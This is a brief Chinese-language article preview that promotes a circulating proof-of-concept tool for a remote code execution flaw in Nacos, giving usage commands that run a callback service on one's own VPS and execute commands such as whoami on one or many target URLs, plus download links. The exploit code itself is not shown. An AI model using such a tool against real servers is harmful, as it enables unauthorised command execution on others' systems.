网传nacos_rce漏洞poc（7月15日更新）

文章预览

=================================== 免责声明 请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络， 安全性自测 ，如有侵权请联系删除。个人微信： ivu123ivu 0x01 工具介绍 网传nacos_rce漏洞poc。 0x02 安装与使用 1. 将config.py和service.py放在自己的vps上并运行 python service .py 2. 单url验证 python  .\Nacos_Rce.py -t vps的ip地址 -p  5000  -u http://xxx.xxx.xxx -c whoami -c whoami 可以不写，默认为whoami,可以自定义命令 3. 多url验证 python .\ Nacos_Rce .py -t vps的ip地址 -p 5000 -f ./url.txt - c whoami - c whoami 可以不写，默认为whoami,可以自定义命令 0x03 项目链接下载 1、点击阅读原文，从原项目地址下载。 2、网盘下载链接： https://pan.quark.cn/s/9b76095dcfa9 ·  今 日 ………………………………